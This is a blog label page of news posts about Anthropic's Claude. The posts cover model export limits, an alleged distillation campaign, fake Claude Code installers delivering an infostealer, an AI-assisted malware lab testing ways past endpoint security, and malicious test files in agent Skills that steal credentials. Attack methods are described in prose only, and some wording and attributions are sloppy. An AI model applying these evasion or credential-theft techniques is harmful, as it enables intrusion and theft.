Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Claude. Show all posts

Anthropic Restores Limited Access to Claude Mythos 5 AI Model After US Government Approval

 

Earlier limits on Anthropic’s top-tier AI tools have been eased by U.S. officials, reopening limited availability of the Claude Mythos 5 system to certain approved American institutions. Though only recently barred due to fears about potential misuse threatening national safety, the model is now accessible again under tight conditions. Government oversight in high-level AI deployment continues expanding, especially when such systems involve strong digital defense functions. 

While concerns remain, selective reinstatement suggests a shift toward managed access rather than blanket bans. Now cleared by U.S. authorities, Mythos 5 can be used again by groups managing essential infrastructure operations. Over a hundred entities - some among the largest corporations - are set to reconnect under new guidelines. Though access returns in phases, Anthropic emphasizes steady progress restoring function, even as talks continue with federal agencies on widening reach later. 

One goal remains: bringing back full public availability of the Fable 5 system after further review. One restriction began with an export directive dated June 12, forcing Anthropic to shut off entry points to Mythos 5 along with Fable 5. Not long after, OpenAI revealed a delay in launching GPT-5.6 widely - this pause came by direction from U.S. officials. Rather than open access freely, they handed early permissions only to select collaborators, names already passed to federal agencies.

Oversight like this signals a quiet but steady push from regulators to track how powerful artificial intelligence moves into real-world use. Officials worry powerful AI systems might fall into the hands of rival nations - like those in Beijing or Moscow - despite existing barriers. Because these tools can detect system flaws faster than humans, they may speed up digital attacks when protections fail. While designed for defense, their functions could shift toward offense once access is gained through weak points. 

Even infrastructure meant to resist intrusion becomes a target under such conditions. Surprisingly, Anthropic admitted that authorities questioned whether flaws in its security could allow bypassing controls meant to stop abuse of the Fable 5 system when spotting code weaknesses. Although officials noted improvements in handling those dangers, details about the specific defenses enabling partial revival of Mythos 5 remain undisclosed by public agencies. 

Though some defend the selection method, lawyers and tech executives have raised doubts. Questions emerge over who gets picked - free expression supporters point out unclear criteria behind group approvals. Without clear rules on checks, suspicion grows. Safety tests gain backing even as control worries surface; Sam Altman backs strong evaluations yet hesitates at state influence shaping access paths. Decisions made behind closed doors unsettle those watching closely. 

Now, trusted groups working with Mythros 5 won’t need export permits - this applies also to their staff outside the U.S. - as long as they’re named on the official roster. Still, firms left off the list must follow current licensing rules. A number of listed entities belong to Anthropic’s Project Glasswing, it is said, a collaboration hosting around one hundred tech outfits and study centers. 

Now comes news after Donald Trump issued an executive directive creating a non-mandatory process: creators of cutting-edge artificial intelligence may offer their systems to federal authorities for scrutiny during a thirty-day window prior to wider release. Some say this step offers temporary protection until more complete regulatory structures emerge through policy work. 

Yet concerns rise elsewhere - extended delays in launching powerful AI tools might hinder progress, weakening American firms just as international competitors push forward with their own intelligent technologies.

Anthropic Alleges Alibaba Conducted Massive AI Capability Extraction Campaign Against Claude

 


Anthropic has accused Chinese technology conglomerate Alibaba and its AI research division, Qwen, of carrying out a large-scale effort to extract capabilities from its Claude family of artificial intelligence models, describing the incident as the most extensive distillation operation the company has encountered.

The allegations were detailed in a June 10 letter sent to U.S. Senate Banking Committee Chair Tim Scott and Ranking Member Elizabeth Warren. In the correspondence, Anthropic claimed that operators linked to Alibaba and Qwen systematically interacted with Claude in an attempt to capture and reproduce some of the model's most advanced capabilities.

According to the company, the activity occurred between April 22 and June 5, 2026. During that period, Anthropic says it recorded more than 28.8 million exchanges associated with the operation. The requests were allegedly distributed across nearly 25,000 fraudulent accounts, enabling the actors to conduct high-volume interactions with the platform while obscuring the true source of the activity.

Anthropic stated that the campaign was not focused on general-purpose chatbot functions. Instead, it allegedly targeted capabilities considered among the most valuable within the Claude ecosystem, including software engineering tasks and advanced agentic reasoning. These functions form a critical component of the company's Mythos Preview model, one of Anthropic's most sophisticated AI systems designed to perform complex reasoning and autonomous task execution.

At the center of the allegations is a technique known as adversarial distillation. In machine learning, distillation generally refers to the process of training a model using outputs generated by another system. While the approach itself is commonly used within the AI industry, Anthropic argues that the method becomes problematic when it relies on unauthorized access to proprietary models.

According to the company, the actors behind the campaign repeatedly queried Claude and collected its responses at scale. Those outputs could then be used as training material for another AI system, allowing developers to reproduce aspects of Claude's behavior without investing the time, computational resources, and research expenditure typically required to build a frontier model from the ground up.

Anthropic warned lawmakers that such activity enables organizations to appropriate years of research and development through large-scale extraction campaigns. The company argued that these operations are designed to gather capabilities developed by leading U.S. AI laboratories and incorporate them into competing systems without bearing the costs associated with original model development.

Beyond intellectual property concerns, Anthropic also raised questions about safety. The company noted that models trained through adversarial distillation may replicate useful capabilities while failing to inherit the safeguards, alignment mechanisms, and risk controls embedded within the original system. As a result, the practice could create AI models that retain advanced functionality but operate with fewer protections against misuse.

The allegations against Alibaba follow earlier claims made by Anthropic regarding unauthorized access attempts linked to Chinese AI developers. In February 2026, the company disclosed that DeepSeek, the startup whose low-cost AI models attracted global attention in 2025, was among several organizations accused of attempting to improperly obtain Claude outputs. Anthropic now characterizes these incidents as part of a broader pattern of repeated efforts to extract capabilities from leading U.S. AI systems.

The dispute emerges amid growing government scrutiny of advanced AI technologies. Earlier this month, Anthropic revealed that it had received guidance from the Trump administration requiring the company to restrict access to its newest AI models, including Fable 5 and Mythos 5. Under the directive, access would be limited to U.S. persons, preventing non-U.S. citizens, including some employees, from interacting with the latest systems.

The issue is also beginning to influence policy discussions on Capitol Hill. Senators Bill Hagerty and Andy Kim are reportedly preparing legislation that would authorize sanctions or other penalties against Chinese organizations found to have improperly obtained outputs from U.S. AI models for the purpose of training competing systems. The proposal reflects growing concern among lawmakers that frontier AI capabilities have become both strategic economic assets and matters of national security.

Alibaba has not publicly responded to the allegations.

The dispute surfaces a new battleground in the global AI race. As companies invest billions of dollars to develop increasingly capable models, concerns are shifting beyond traditional cybersecurity threats toward the protection of model knowledge itself. For AI developers, the challenge is no longer limited to securing infrastructure and data. It increasingly involves preventing the large-scale extraction of capabilities that can be repurposed to accelerate the development of rival systems.

With governments, technology companies, and regulators paying closer attention to model security, the Anthropic-Alibaba dispute may become an early test case for how the industry addresses unauthorized AI capability harvesting and the growing geopolitical competition surrounding advanced artificial intelligence.

Hackers Exploit Fake Claude Code Installers and Install Malware


Developers looking into Claude Code deployment instructions could be lured into an advanced malware campaign that hides itself as a genuine AI tooling documentation. 

Fake Claude code exploit

Experts found a few fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

According to Straiker researchers, “the attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt.  “You copy a command. You paste it in your terminal. By then, it’s already too late,” said Straiker researchers in their analysis of the campaign. 

Highlights of the fake Claude code campaign 

1. Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign utilises SEO infection and Google ads to deploy malicious install web pages over genuine documentation.

2. Threat actors hide infected commands within genuine installation commands, without impacting the deployment process.

3. The malware particularly attacks AI-based assets such as cloud development credentials, API keys, and verification tokens.

About the credential theft campaign 

The campaign attacked users of famous AI and developer tools, such as Claude Code, JetBrains, Perplexity Comet, and Cline. 

As per the experts, the operation depends on over 88 domains hosted throughout genuine platforms and constantly shuffles infrastructure, letting malicious sites to immediately resurface after shutdowns. To trap targets, threat actors use redirect chains, SEO poisoning and paid Google ads that place scammed installations over genuine documentation in search results.

These websites closely impersonate genuine vendor resources and demonstrate installation commands that look genuine but include hidden separators, such as “&,” that launch malicious actions along with the expected software deployment.

In various incidents, the genuine command still runs effectively, helping hide the hack.

Delivery of malware and launch tactics

Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts. 

By such techniques, hackers improve their potential to escape convention detection tools. Contrary to infostealers, the campaign pick on AI assets like authentication tokens, API Key, and cloud development credentials from tools such as Continue[.]dev, Cline. 

After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Experts found the primary payload as ACRStealer, a malware family that steals information and has developed to include sophisticated encryption and escape tactics. Experts also identified a cryptocurrency clipboard hacker that rediverts transactions by replacing copied wallet addresses.

AI-Assisted Malware Lab Found Testing Ways to Evade Security Tools, Sophos Reports

 



Researchers at cybersecurity firm Sophos have uncovered a malware development framework that uses artificial intelligence tools to speed up the creation and testing of ransomware-related software designed to avoid detection by security products.

The investigation began after Sophos analysts discovered suspicious files on a customer system. What initially appeared to be a collection of penetration-testing tools soon revealed signs of criminal activity, including references to ransom notes and organizations listed on ransomware leak sites.

According to Sophos, the framework combines traditional attack tools with AI-assisted development workflows. Researchers found evidence that the operators used coding assistants such as Cursor and Claude Opus during different stages of development, including writing code, reviewing results, refining payloads, and researching techniques that could help malware evade security controls.

One of the framework's primary goals was to bypass Endpoint Detection and Response (EDR) platforms. These security products are designed to identify malicious activity on computers and servers, often detecting attacks that traditional antivirus software might miss.

The toolkit contained several components intended to reduce the chances of detection. Among them were customized Cobalt Strike profiles that made malicious network traffic resemble ordinary web browsing activity, communication channels that routed commands through Telegram, and malware development scripts capable of injecting malicious code into legitimate Windows applications while allowing those programs to continue functioning normally.

Researchers also identified the use of a Cloudflare Worker that acted as an intermediary between infected systems and attacker-controlled infrastructure. This setup can make it more difficult for defenders to identify the true location of command-and-control servers.

A particularly notable feature of the framework was an automated Active Directory discovery system. Active Directory is widely used in enterprise networks to manage users, computers, permissions, and other resources. Because it contains valuable information about an organization's internal structure, attackers frequently attempt to map Active Directory environments after gaining access to a network.

Sophos found that the discovery process relied on a series of AI-assisted agents that gathered information, assessed results, selected follow-up actions, and continued the investigation of the network. Rather than requiring a human operator to manually perform every step, parts of the reconnaissance process could be carried out through predefined automated workflows.

The framework itself appeared to operate through multiple specialized AI agents assigned to different tasks. Sophos reported that one agent coordinated the overall development process while others focused on testing, documentation, operational security improvements, virtual machine deployment, proxy testing, and malware evaluation.

Researchers also discovered that some agents had been tasked with examining publicly available security research. The system collected information from technical reports and research publications, extracted details about detection-evasion methods, mapped those techniques to the MITRE ATT&CK framework, recreated testing environments, and documented the results.

At the center of the operation was a Python-based payload generation tool. This component produced malware written primarily in Rust and Go while combining encryption, execution techniques, and anti-analysis measures intended to make detection more difficult. Sophos observed nearly 80 generated modules being tested against more than 70 separate evasion methods.

The malware was evaluated in laboratory environments against security products from Sophos, CrowdStrike, and Microsoft. Researchers noted that repeated testing and revision cycles appeared to improve the success rate of many payloads. However, they also observed inconsistencies between some reported results and actual testing outcomes, leaving questions about the accuracy of certain internal performance claims.

Despite the extensive use of artificial intelligence during development, Sophos found no indication that AI was embedded within deployed malware or operating independently on victim systems. The technology was primarily used to accelerate the research, testing, and refinement process while human operators remained responsible for directing the activity.

The findings provide another example of how threat actors are incorporating AI into existing workflows. Rather than introducing entirely new attack methods, these tools appear to be helping attackers shorten the time needed to transform publicly available security research into functioning malware capable of challenging modern security defenses.

Anthropic's Mythos Preview Detects Over 10,000 Software Bugs in Project Glassing


Recently, Anthropic disclosed that its Project Glasswing initiative found over 10,000 critical or high vulnerabilities in system software in its first month of operation.

Claude Mythos Preview finds bugs

Claude and 50 other partners deployed Claude Mythos Preview to find critical software infrastructure. The AI company said the initiative progress is now restricted by the pace at which flaws can be authorized, patched, and disclosed instead of discovery rates. 

The discovery of flaws

Cloudflare detected 2,000 vulnerabilities throughout its critical-path systems, with around 400 labelled as critical or high severity. Claude said that its bug-finding rate surged by over ten times. Various other partners reported the same surges in flaw detection rates.

About bug patches

The UK’s AI Security Institute reported that Mythos Preview has been the only model to patch both of its cyber issues end-to-end. Mozilla detected and patched 271 bugs in Firefox while analyzing Mythos Preview. The number is ten times more than Firefox 148 with Claude Opus 4.6. 

More about Anthropic patching flaws

Anthropic analyzed over 1,000 open-source projects via Mythos Preview, and found 6,202 estimated high or critical severity bugs out of 23,019. Out of 1,752 critical or high bugs studied by independent security research institutes, 90.6% were acknowledged as valid and 62.4% were confirmed as critical or high severity.

One bug was found in wolfSSL, a cryptographic library that billions of devices use. If successful, the bug would have allowed a threat actor to make fake certificates and host fake sites for email providers or banks. The bus was labelled as CVE-2026-5194 and has been fixed.

Critical vulnerabilities

Anthropic has revealed 530 critical or high bugs to researchers. Seventy-five have been fixed and sixty-five have been given public advisories. Claude said that a high or critical flaw detected by Mythos Preview roughly takes two weeks to fix on average.

In its recent release, Palo Alto Networks added more than five times as many patches as normal. Microsoft stated that it will keep releasing further fixes. Oracle is identifying and resolving vulnerabilities in all of its products many times more quickly than in the past.

Three weeks ago, Anthropic made Claude Security available to clients of Claude Enterprise in a public beta. Claude Opus 4.7 has been used to patch more than 2,100 vulnerabilities.

To help maintainers handle bug reports, the corporation partnered with the Alpha-Omega project of the Open Source Security Foundation. Anthropic has not made Mythos-class models available to the general public, citing the necessity for more robust security measures to stop abuse.

OpenCode’s Rapid Growth Reflects Rising Developer Concerns Over AI Vendor Dependence

 





A glaring divide is emerging in the AI coding industry as developers increasingly weigh the convenience of fully managed coding platforms against the flexibility of open-source alternatives designed to avoid dependence on a single provider.

The debate intensified this week after Anthropic used its first “Code with Claude” developer conference to showcase major upgrades across its Claude Code ecosystem. The company announced that rate limits for Claude Code users on Pro, Max, Team, and Enterprise plans would be significantly expanded, while peak-hour usage restrictions were removed entirely. Anthropic also raised usage limits for its Opus API and disclosed a major infrastructure agreement with SpaceX involving the Colossus 1 data center.

According to the company, the agreement will provide access to more than 300 megawatts of computing power and approximately 220,000 Nvidia GPUs expected to come online within weeks. The move reflects the broader AI industry race to secure high-performance computing infrastructure as demand for generative AI services continues to increase.

Anthropic also introduced several updates aimed at turning Claude Code into a more advanced managed development environment. These included expanded Managed Agents capabilities, support for coordinating multiple AI agents simultaneously, a public beta feature called Outcomes, and an experimental memory system internally referred to as “dreaming,” which is intended to help AI systems retain and improve contextual understanding over time.

During the event, Anthropic executive Boris Cherny demonstrated remote agents and automated routines capable of running coding tasks asynchronously, effectively allowing Claude Code to function more like a workflow orchestration platform rather than a traditional coding assistant.

At the same time, a separate trend has been accelerating across the open-source community. OpenCode, an independent coding harness project associated with SST, has experienced a dramatic rise in popularity after positioning itself as an alternative to vendor-controlled AI development environments.

The project’s GitHub repository has now surpassed 157,000 stars, overtaking the roughly 122,000 stars associated with Anthropic’s own Claude Code repository at the time of reporting. While GitHub stars do not necessarily represent active users or production deployments, they are often viewed as indicators of developer awareness, interest, and community support.

The roots of OpenCode’s instant growth trace back to January 2026, when Anthropic introduced server-side authentication checks that prevented third-party tools from accessing Claude Pro and Max subscriptions through OAuth-based authentication methods.

Several projects, including OpenCode, Cline, and RooCode, were affected by the policy change. Prior to the restrictions, these tools allowed developers to run autonomous coding workflows through fixed-price Claude subscriptions rather than paying significantly higher API-based usage fees tied to token consumption.

From Anthropic’s perspective, the restriction addressed a business and infrastructure problem. Subscription plans were designed to support usage within the company’s own ecosystem, while third-party tools were effectively redirecting high-volume workloads through pricing structures never intended for external automation platforms.

Discussions across developer forums, including lengthy conversations on Hacker News, showed that many users understood Anthropic’s reasoning. However, criticism quickly emerged over the manner in which the restrictions were enforced. Developers reported that the changes were introduced without advance notice, disrupting workflows in active sessions. Some users also claimed that automated abuse-detection systems temporarily restricted accounts during the transition period.

OpenCode responded rapidly after the restrictions took effect. The project added support for ChatGPT Plus integrations within hours and began expanding compatibility across multiple AI providers. Anthropic later formalized its position in updated Terms of Service published in February, clarifying that subscription OAuth tokens were not intended for third-party routing or automation tools.

The dispute escalated further in March after OpenCode reportedly received legal requests related to Claude subscription authentication. Shortly afterward, the project merged an update removing references to Claude Pro and Max authentication from its codebase. By April 4, Anthropic’s enforcement measures had expanded to additional third-party harnesses, including OpenClaw and NanoClaw, pushing developers toward pay-as-you-go API billing structures.

Interest in OpenCode accelerated during this period. On March 21, a Hacker News discussion surrounding the project gained more than 1,200 points and hundreds of comments, driving additional visibility across the developer community. By early April, the repository had already crossed 120,000 GitHub stars.

As of May 8, project activity data showed approximately 156,904 stars, 18,259 forks, 4,788 issues, and more than 1,600 open pull requests. OpenCode’s website also claimed participation from over 850 contributors and estimated usage among roughly 6.5 million monthly developers.

Industry observers note that the OAuth dispute alone likely does not explain OpenCode’s growth. Instead, the incident appears to have accelerated an existing movement toward model-agnostic development tools. OpenCode gradually shifted its messaging away from low-cost Claude access and toward provider neutrality, emphasizing that developers should be able to switch between AI models as pricing, performance, and capabilities evolve.

That distinction is increasingly important as competition intensifies between major AI providers. A developer using a model-agnostic harness can move between Anthropic, OpenAI, or other models with relatively minor configuration changes. In contrast, developers operating entirely within a vertically integrated ecosystem may face higher switching costs if pricing structures, usage limits, or platform policies change unexpectedly.

The debate mirrors earlier divisions within the software infrastructure industry. Some analysts have compared the current situation to Docker and Podman, where one platform focused heavily on integrated services and managed workflows while the other prioritized portability, operational control, and independence from platform lock-in.

OpenCode’s rise has also drawn criticism from parts of the developer community. Users in public discussions have raised concerns about high memory usage, the growing complexity of the project’s TypeScript codebase, inconsistent release stability, and the broader security implications of integrating multiple AI providers into a single framework.

Security considerations remain particularly relevant because every additional provider connection potentially expands the software’s attack surface. OpenCode also faced backlash after removing Claude subscription authentication support following reported legal pressure, with some developers expressing frustration over how the project handled the situation.

Still, the overall ndustry direction appears increasingly clear. Anthropic is investing heavily in a future built around tightly managed AI coding ecosystems that combine infrastructure, orchestration, memory systems, and coding assistance within a single platform.

At the same time, open-source projects such as OpenCode, Cline, Aider, and OpenClaw continue to attract developers seeking portability and reduced dependency on individual AI vendors.

For many software teams, the central issue is no longer choosing between Claude Code and OpenCode alone. Instead, developers are beginning to decide whether critical AI-assisted workflows should remain under the control of a single provider or operate through more flexible systems capable of adapting as the AI landscape continues to shift.

Researchers Find Security Gap in Anthropic Skill Scanners




Security researchers have uncovered a gap in the way Anthropic Skill scanning tools inspect third-party AI packages, allowing malicious code hidden inside test files to execute on developer systems even after scanners marked the Skills as safe.

The issue centers on Anthropic Skills, reusable packages designed for AI coding assistants such as Claude Code, Cursor, and Windsurf. These packages often include instructions, scripts, and configuration files that help AI agents perform development tasks inside IDE environments.

Researchers from Gecko Security found that existing Skill scanners focus primarily on files tied directly to agent behavior, particularly SKILL.md, while ignoring bundled test files that can still run locally through standard developer tooling.

In the demonstrated attack chain, a Skill passed all scanner checks because its visible instruction files contained no prompt injection attempts, suspicious shell commands, or malicious instructions. However, the repository also included a hidden .test.ts file stored elsewhere in the directory structure. Although the file was outside the agent execution layer, it still executed through the project’s testing framework with full access to local resources.

According to researcher Jeevan Jutla, the problem begins when developers install a Skill using the npx skills add command. The installer copies nearly the entire repository into the project’s .agents/skills/ directory. Only a few items, including .git, metadata.json, and files prefixed with underscores, are excluded during installation.

Once placed inside the repository, testing frameworks such as Jest and Vitest automatically discover matching test files through recursive glob patterns. Both frameworks reportedly enable the dot:true option, allowing them to search inside hidden directories including .agents/. Mocha follows similar recursive discovery behavior in many default configurations.

A malicious Skill can therefore include a file such as reviewer.test.ts containing a beforeAll function that silently executes before visible tests begin. Researchers said these payloads can access environment variables, .env files, SSH keys, AWS credentials, deployment tokens, and other sensitive information commonly available inside local developer environments and CI pipelines. The data can then be transmitted to external servers without triggering obvious warnings during test execution.

The researchers stressed that the AI agent itself is never involved in the compromise. Instead, the malicious behavior occurs through trusted developer tooling already integrated into the software workflow. Existing scanners inspect the files the AI agent can interpret, but not the files executed separately by testing infrastructure.

The technique resembles older software supply-chain attacks involving malicious npm postinstall scripts and poisoned pytest plugins. However, Gecko Security noted that the Anthropic Skill ecosystem creates an additional propagation problem because installed Skills are often committed into shared repositories so teams can reuse them collaboratively.

GitHub’s default .gitignore templates do not automatically exclude .agents/ directories. Once a malicious test file enters the repository, every teammate cloning the project and every CI pipeline running automated tests may execute the payload across branches, forks, and deployment workflows.

The findings arrived shortly after multiple large-scale security audits examining the broader Anthropic Skills ecosystem. A January academic study named SkillScan analyzed 31,132 Skills collected from two major marketplaces and found that 26.1% contained at least one vulnerability spanning 14 separate patterns. Data exfiltration appeared in 13.3% of examined Skills, while privilege escalation appeared in 11.8%. Researchers also determined that Skills bundling executable scripts were 2.12 times more likely to contain vulnerabilities than instruction-only packages.

Several weeks later, Snyk published its ToxicSkills audit covering 3,984 Skills from ClawHub and skills.sh. The company reported that 13.4% of scanned Skills contained at least one critical-level security issue. Automated analysis combined with human review identified 76 confirmed malicious payloads, while eight malicious Skills reportedly remained publicly accessible on ClawHub when the findings were released.

In April, Cisco introduced an AI Agent Security Scanner integrated into IDE platforms including VS Code, Cursor, and Windsurf. The scanner can detect prompt injection attempts, suspicious shell execution patterns, and data exfiltration behaviors within Skill definitions and agent-referenced scripts. However, Gecko Security said bundled test files remain outside the scanner’s documented detection surface because the tool was designed around agent interaction layers rather than developer execution layers.

Researchers noted that other products, including Snyk Agent Scan and VirusTotal Code Insight, face similar structural limitations. These tools inspect what the agent is instructed to execute but may overlook code paths triggered separately through local development frameworks.

Elia Zaitsev described the broader issue as a distinction between interpreting intent and monitoring actual execution behavior. In this case, the malicious code did not depend on prompt manipulation or AI instructions. It operated as ordinary TypeScript executed through legitimate test runners with full local permissions.

Zaitsev also warned that enterprise AI agents increasingly operate with privileged access to OAuth tokens, API keys, and centralized data sources. If those credentials are accessible through environment variables during automated testing, malicious test payloads can reach sensitive infrastructure without requiring direct agent compromise.

Mike Riemer added that threat actors frequently reverse engineer security patches within 72 hours of release, while many organizations take far longer to deploy fixes. In the case of the Anthropic Skill test-file issue, researchers warned that the exposure window becomes more difficult to manage because the malicious files may execute immediately after installation without triggering scanner alerts.

Security researchers are urging development teams to block test discovery inside .agents/ directories and inspect Skill repositories for files such as *.test.*, *.spec.*, conftest.py, __tests__/, and suspicious configuration scripts before merging code.

The report also recommends pinning Skill installations to verified commit hashes rather than installing the latest repository version. Researchers said this reduces the risk of attackers submitting clean repositories for scanner approval before later inserting malicious files. The approach aligns with guidance published in the OWASP Agentic Skills Top 10 project.

Organizations that already store Skills inside repositories are advised to audit existing .agents/ directories immediately, rotate exposed credentials if suspicious files are discovered, inspect CI logs for unexplained outbound network traffic, and review repository history to identify when potentially malicious files entered development pipelines.

The researchers additionally called on security vendors to provide greater transparency regarding which directories, execution surfaces, and file categories their scanners actually inspect. They argued that security teams evaluating Anthropic Skill scanners should verify whether products analyze bundled test files, build scripts, and CI configurations rather than focusing exclusively on prompt injection and agent instruction analysis.

22 Year Old Developer Reverse Engineered Code in Claude Mythos, Tech Industry Shocked

 


Earlier this year, AI tech giant Anthropic launched its powerful new model called Claude Mythos. It created storms in the silicon valley and tech industry. The general-purpose model could find software bugs that no human knew ever existed.

About Claude Mythos


But Claude did not launch Mythos to the world, it only offered it to cybersecurity experts at big organizations that make or have critical software infrastructure and asked them to find and patch flaws before Anthropic released it commercially for the public use.

But, in just two weeks, a 22-year old developer called Kye Gomez made predictions about the core designs that made Claude Mythos advanced and later published OpenMythos. It is an open project that anticipates Anthropic’s breakthrough. Gomez’s code created a tsunami in the AI and tech research community.

If real, this incident can have serious implications . Why? Because if a self-taught developer can reverse engineer the infrastructure innovation of a billion-dollar AI firm in just a few days, then what can threat-actors with malicious intent do. If this happens, the proprietary debate about AI architecture will fade away.

About OpenMythos


OpenMythos allows developers to run and train effective variants of these models on laptops, also raising concerns about long-term dependency on huge, environment and community-destroying data centers.

Boon or curse?


Fortunately, organizations won’t be able to get AI secrets that only the big tech companies such as OpenAI, Anthropic, or Google control.

But what if users and small teams across the world can also reverse engineer the code of the biggest AI companies? It will be difficult to maintain a safe-tech world order. Advanced capabilities will sprout, and it will be difficult to contain.

About the developer, Gomez is not your typical ML engineer. He started coding as a kid, left school early and did not attend college. He built his reputation via coding.

Why OpenMythos


OpenMythos is built upon Gomez’s hypothesis that Claude Mythos uses a unique large language model (LLM) that has been under development since 2022 and shown reliability while training at scale at the start of this year. How is OpenMythos different from Claude Mythos?

Instead of putting neural network layers to give models more depth, experts advised looping data repetitively via smaller packets. This gave the model depth in due time.

Salesforce’s New “Headless 360” Lets AI Agents Run Its Platform

 


Salesforce has introduced what it describes as the most crucial architectural overhaul in its 27-year history, launching a new initiative called “Headless 360.” The update is designed to allow artificial intelligence agents to control and operate the company’s entire platform without requiring a traditional graphical interface such as a dashboard or browser.

The announcement was made during the company’s annual TDX developer conference in San Francisco, where Salesforce revealed that it is releasing more than 100 new developer tools and capabilities. These tools immediately enable AI systems to interact directly with Salesforce environments. The move reflects a deeper shift in enterprise software, where the rise of intelligent agents capable of reasoning and executing tasks is forcing companies to rethink whether conventional user interfaces are still necessary.

Salesforce’s answer to that question is direct: instead of designing software primarily for human interaction, the platform is now being rebuilt so that machines can access and operate it programmatically. According to the company, this transformation began over two years ago with a strategic decision to expose all internal capabilities rather than keeping them hidden behind user interfaces.

This shift is taking place during a period of uncertainty in the broader software industry. Concerns that advanced AI models developed by companies like OpenAI and Anthropic could disrupt traditional software business models have already impacted market performance. Industry indicators, including software-focused exchange-traded funds, have declined substantially, reflecting investor anxiety about the long-term relevance of existing SaaS platforms.

Senior leadership at Salesforce has indicated that the new architecture is based on practical challenges observed while deploying AI systems across enterprise clients. According to internal insights, building an AI agent is only the initial step. Organizations also face ongoing challenges related to development workflows, system reliability, updates, and long-term maintenance.

To address these challenges, Headless 360 is structured around three foundational pillars.

The first pillar focuses on development flexibility. Salesforce has introduced more than 60 tools based on Model Context Protocol, along with over 30 pre-configured coding capabilities. These allow external AI coding agents, including systems such as Claude Code, Cursor, Codex, and Windsurf, to gain direct, real-time access to a company’s Salesforce environment. This includes data, workflows, and underlying business logic. Developers are no longer required to use Salesforce’s own integrated development environment and can instead operate from any terminal or external setup.

In addition, Salesforce has upgraded its native development environment, Agentforce Vibes 2.0, by introducing an “open agent harness.” This system supports multiple agent frameworks, including those from OpenAI and Anthropic, and dynamically adjusts capabilities depending on which AI model is being used. The platform also supports multiple models simultaneously, including advanced systems like Claude Sonnet and GPT-5, while maintaining full awareness of the organization’s data from the start.

A notable technical enhancement is the introduction of native React support. During demonstrations, developers created a fully functional application using React instead of Salesforce’s traditional Lightning framework. The application connected to Salesforce data through GraphQL while still inheriting built-in security controls. This significantly expands front-end flexibility for developers.

The second pillar focuses on deployment. Salesforce has introduced an “experience layer” that separates how an AI agent functions from how it is presented to users. This allows developers to design an experience once and deploy it across multiple platforms, including Slack, mobile applications, Microsoft Teams, ChatGPT, Claude, Gemini, and other compatible environments. Importantly, this can be done without rewriting code for each platform. The approach represents a change from requiring users to enter Salesforce interfaces to delivering Salesforce-powered experiences directly within existing workflows.

The third pillar addresses trust, control, and scalability. Salesforce has introduced a comprehensive set of tools that manage the entire lifecycle of AI agents. These include systems for testing, evaluation, monitoring, and experimentation. A central component is “Agent Script,” a new programming language designed to combine structured, rule-based logic with the flexible reasoning capabilities of AI models. It allows organizations to define which parts of a process must follow strict rules and which parts can rely on AI-driven decision-making.

Additional tools include a Testing Center that identifies logical errors and policy violations before deployment, custom evaluation systems that define performance standards, and an A/B testing interface that allows multiple agent versions to run simultaneously under real-world conditions.

One of the key technical challenges addressed by Salesforce is the difference between probabilistic and deterministic systems. AI agents do not always produce identical results, which can create instability in enterprise environments where consistency is critical. Early adopters reported that once agents were deployed, even small modifications could lead to unpredictable outcomes, forcing teams to repeat extensive testing processes.

Agent Script was developed to solve this problem by introducing a structured framework. It defines agent behavior as a state machine, where certain steps are fixed and controlled while others allow flexible reasoning. This approach ensures both reliability and adaptability.

Salesforce also distinguishes between two types of AI system architectures. Customer-facing agents, such as those used in sales or support, require strict control to ensure they follow predefined rules and maintain brand consistency. These operate within structured workflows. In contrast, employee-facing agents are designed to operate more freely, exploring multiple paths and refining their outputs dynamically before presenting results. Both systems operate on a unified underlying architecture, allowing organizations to manage them without maintaining separate platforms.

The company is also expanding its ecosystem. It now supports integration with a wide range of AI models, including those from Google and other providers. A new marketplace brings together thousands of applications and tools, supported by a $50 million initiative aimed at encouraging further development.

At the same time, Salesforce is taking a flexible approach to emerging technical standards such as Model Context Protocol. Rather than relying on a single method, the company is offering APIs, command-line interfaces, and protocol-based integrations simultaneously to remain adaptable as the industry evolves.

A real-world example surfaced during the announcement demonstrated how one company built an AI-powered customer service agent in just 12 days. The system now handles approximately half of customer interactions, improving efficiency while reducing operational costs.

Finally, Salesforce is also changing its business model. The company is shifting away from traditional per-user pricing toward a consumption-based approach, reflecting a future where AI agents, rather than human users, perform the majority of work within enterprise systems.

This transformation suggests a new layer in strategic operations. Instead of resisting the rise of AI, Salesforce is restructuring its platform to align with it, betting that its existing data infrastructure, enterprise integrations, and accumulated operational logic will continue to provide value even as software becomes increasingly autonomous.

Microsoft Releases AI Upgrades, Launches Copilot Cowork to Early Access Customers


In an effort to enhance its AI offering and increase adoption, Microsoft (MSFT.O) recently introduced new features in its Copilot research assistant that would enable users to employ various AI models concurrently within the same workflow.

Instead of relying on a single model, Copilot's Researcher agent can now pull outputs from both OpenAI's GPT and Anthropic's Claude models for each response, thanks to a new feature called "Critique."

According to Microsoft, Claude will check the quality and correctness of the response before GPT provides it to the user. In the future, the business hopes to make that workflow bidirectional so that GPT may also evaluate Claude's writings.

"Having different models from ​different vendors in Copilot is highly attractive - but we're taking this to the next level, where customers actually get the benefits of the models working together," Nicole Herskowitz, VP of Copilot and  Microsoft, said to Reuters. 

The multi-model strategy will assist in increasing productivity and quality for customers by accelerating user workflow, controlling AI hallucinations, which occur when systems give incorrect information, and producing more dependable outputs.

Additionally, Microsoft is introducing a feature called "Council" that will let users compare results from various AI models side by side. The updates coincide with Microsoft expanding access to its new Copilot Cowork agentic AI tool for members of its "Frontier" program, which gives users early access to some of its most recent AI innovations.

According to Jared Spataro, Microsoft's AI-at-Work efforts leader, “We work only in a cloud environment, and we work only on behalf of the user. So you know exactly what information it (Copilot Cowork) has access ​to.”

On Monday, the company's stock increased by almost 1%. However, as investor confidence in AI declines, the stock is poised for its worst quarter since the global financial crisis of 2008, with a nearly 25% decline.

Microsoft capitalized on the increasing demand for autonomous AI agents earlier this month by releasing Copilot Cowork, a solution based on Anthropic's popular Claude Cowork product, in testing mode.

